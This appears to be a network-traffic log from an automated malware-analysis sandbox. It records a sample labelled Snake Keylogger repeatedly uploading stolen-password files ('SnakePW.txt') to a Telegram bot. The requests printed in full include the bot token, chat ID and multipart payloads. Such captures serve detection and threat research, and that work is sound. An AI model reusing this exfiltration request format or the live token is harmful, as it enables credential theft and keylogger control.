                            2022-06-26 07:34:31 UTC441OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 37 39 36 34 33 39 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575717964394Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:31 UTC441INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:31 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:31 UTC441INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67045,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228871,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            262192.168.2.550180149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:31 UTC442OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575717d1de33
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:31 UTC442OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 37 64 31 64 65 33 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575717d1de33Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:32 UTC443INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:31 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:32 UTC443INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67046,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228871,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            263192.168.2.550183149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:32 UTC444OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757180fda9c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:32 UTC444OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 38 30 66 64 61 39 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757180fda9cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:32 UTC444INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:32 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:32 UTC445INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67047,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228872,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            264192.168.2.550185149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:32 UTC445OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757184b76f0
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:32 UTC446OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 38 34 62 37 36 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757184b76f0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:32 UTC446INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:32 GMT
                            Content-Type: application/json
                            Content-Length: 509
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:32 UTC447INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 34 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 32 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67049,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228872,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            265192.168.2.550188149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:32 UTC447OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575718824b6c
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:32 UTC447OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 38 38 32 34 62 36 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575718824b6cContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:33 UTC448INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:33 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:33 UTC448INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67050,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228873,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            266192.168.2.550192149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:33 UTC449OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575718ed951d
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:33 UTC449OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 38 65 64 39 35 31 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575718ed951dContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:33 UTC450INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:33 GMT
                            Content-Type: application/json
                            Content-Length: 507
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:33 UTC450INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67051,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228873,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            267192.168.2.550195149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:33 UTC450OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da575719293048
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:33 UTC451OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 32 39 33 30 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da575719293048Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:34 UTC451INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
                            Date: Sun, 26 Jun 2022 07:34:34 GMT
                            Content-Type: application/json
                            Content-Length: 510
                            Connection: close
                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                            Access-Control-Allow-Origin: *
                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                            2022-06-26 07:34:34 UTC452INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 36 37 30 35 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 35 33 39 32 38 37 30 30 37 38 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4d 61 67 69 63 61 6c 6c 6f 67 73 5f 62 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 38 35 36 31 30 38 38 34 38 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 53 63 6f 74 74 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 43 6c 61 72 6b 65 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 35 36 32 32 38 38 37 34 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f
                            Data Ascii: {"ok":true,"result":{"message_id":67052,"from":{"id":5392870078,"is_bot":true,"first_name":"Magicallogs","username":"Magicallogs_bot"},"chat":{"id":1856108848,"first_name":"Scott","last_name":"Clarke","type":"private"},"date":1656228874,"document":{"file_


                            Session IDSource IPSource PortDestination IPDestination PortProcess
                            268192.168.2.550197149.154.167.220443C:\Users\user\Desktop\0OZQi3b0tM.exe
                            TimestampkBytes transferredDirectionData
                            2022-06-26 07:34:34 UTC452OUTPOST /bot5392870078:AAEZf0ajeo_PMkBddeC_JE--NP4u4367N6c/sendDocument?chat_id=1856108848&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                            Content-Type: multipart/form-data; boundary=------------------------8da5757196006aa
                            Host: api.telegram.org
                            Content-Length: 504
                            2022-06-26 07:34:34 UTC452OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 61 35 37 35 37 31 39 36 30 30 36 61 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 61 6c 66 6f 6e 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 32 38 34 39 39 32 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 36 2f 32 36 2f 32 30 32 32 20 2f 20 39 3a 33 32 3a 32 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50
                            Data Ascii: --------------------------8da5757196006aaContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:284992Date and Time: 6/26/2022 / 9:32:22 AMClient IP
                            2022-06-26 07:34:34 UTC453INHTTP/1.1 200 OK
                            Server: nginx/1.18.0
